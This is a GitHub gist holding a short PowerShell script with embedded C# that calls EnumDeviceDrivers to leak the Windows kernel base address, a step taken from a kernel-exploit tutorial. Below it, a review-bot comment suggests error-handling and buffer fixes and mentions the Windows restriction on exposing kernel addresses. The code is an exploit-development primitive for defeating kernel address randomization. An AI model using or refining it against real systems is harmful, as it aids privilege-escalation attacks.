Created
September 26, 2023 03:16
Revisions
aaaddress1 created this gist
Sep 26, 2023
@@ -0,0 +1,34 @@ Add-Type -TypeDefinition @" // ref: http://showlinkroom.me/2020/10/16/WindowKernelExploit01/ using System; using System.Diagnostics; using System.Runtime.InteropServices; using System.Security.Principal; public static class EVD2 { [DllImport("kernel32.dll")] public static extern uint GetLastError(); [DllImport("psapi")] public static extern bool EnumDeviceDrivers( [MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] UInt64[] ddAddresses, UInt32 arraySizeBytes, [MarshalAs(UnmanagedType.U4)] out UInt32 bytesNeeded ); } "@ Function LeakBaseAddress(){ $dwByte = 0 $status=[bool] [EVD2]::EnumDeviceDrivers(0, 0, [ref]$dwByte) if(!$status){ echo $("[*] Unable to enum device.... with error 0x{0:x}`n" -f [EVD2]::GetLastError()) } $ptrAddress = [Uint64[]](9)*0x1000 $status=[bool] [EVD2]::EnumDeviceDrivers([UInt64[]]$ptrAddress, $dwByte+10, [ref]$dwByte) # echo $("Address is {0:x}" -f $ptrAddress[0]) return $ptrAddress[0] } $leakAddress = LeakBaseAddress echo $("Address is {0:x}" -f $leakAddress)
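Review bot: The second `EnumDeviceDrivers` call in `LeakBaseAddress` assigns `$status` but never tests it, and the buffer is pre-filled with 9, so a failed call makes the script print 9 as though it were an address; add `if(!$status){ return 0 }` before `return $ptrAddress[0]`, and likewise return after the error message of the first call instead of continuing. The error code printed there is unreliable, because a separate P/Invoke to `GetLastError` can read a value the runtime has already overwritten; declare `[DllImport("psapi", SetLastError = true)]` and read `[System.Runtime.InteropServices.Marshal]::GetLastWin32Error()` instead. The size argument `$dwByte+10` is not tied to the 0x1000-element array that was allocated, so `$ptrAddress.Length * 8` is the safer value to pass, and `ArraySubType = UnmanagedType.U4` looks inconsistent with a `UInt64[]` parameter and should be confirmed. A comment should also state that a zero result is expected where Windows withholds kernel addresses from the caller (low-integrity processes, and, as far as I know, callers without SeDebugPrivilege on recent builds), since that restriction is the mitigation this call runs into.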